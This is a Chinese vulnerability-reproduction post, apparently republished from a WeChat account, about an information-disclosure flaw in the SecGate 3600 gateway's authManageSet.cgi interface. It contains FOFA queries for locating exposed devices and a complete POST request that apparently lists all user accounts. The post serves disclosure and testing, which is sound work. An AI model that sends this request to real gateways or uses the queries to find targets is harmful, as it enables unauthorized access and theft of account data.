@[toc]
X神 SecGate3600 authManageSet.cgi 接口存在敏感信息泄露漏洞
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. X神 SecGate3600接口简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
X神SecGate 3600安全网关(UTM)是基于完全自主研发、经受市场检验的成熟稳定SecOS操作系统
2.漏洞描述
X神SecGate 3600安全网关(UTM)是基于完全自主研发、经受市场检验的成熟稳定SecOS操作系统 并且在专业防火墙、VPN、IPS、IDS、防毒墙的多年产品经验积累基础上经过12个月的精心研发 专门为大型单位的分支机构和中小企业打造的集防火墙、防病毒、抗DDoS攻击、VPN、内容过滤、反垃圾邮件、IPS、带宽管理、用户认证等多项安全技术于一身的主动防御网关系统。X神SecGate 3600安全网关(UTM)可灵活部署在政府、企事业单位及其分支机构网络的边界,为用户同时提供多种、多层次安全防御,保护用户网络免受病毒、蠕虫、木马、垃圾邮件以及未知的攻击等混合威胁的侵害,同时为用户节省了购买多个设备的高昂费用,可简便地统一管理各种安全模块及相关日志、报告,大大降低了设备的部署、管理和维护成本。
CVE编号:
CNNVD编号:
CNVD编号:
3.影响版本
X神SecGate 3600
4.fofa查询语句
body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="
5.漏洞复现
漏洞链接:http://127.0.0.1/cgi-bin/authUser/authManageSet.cgi
漏洞数据包:
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 77
Connection: closetype=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc
7.整改意见
请联系厂商更新:https://www.legendsec.com/
原文始发于微信公众号(南风漏洞复现文库):X神 SecGate3600 authManageSet.cgi 接口存在敏感信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论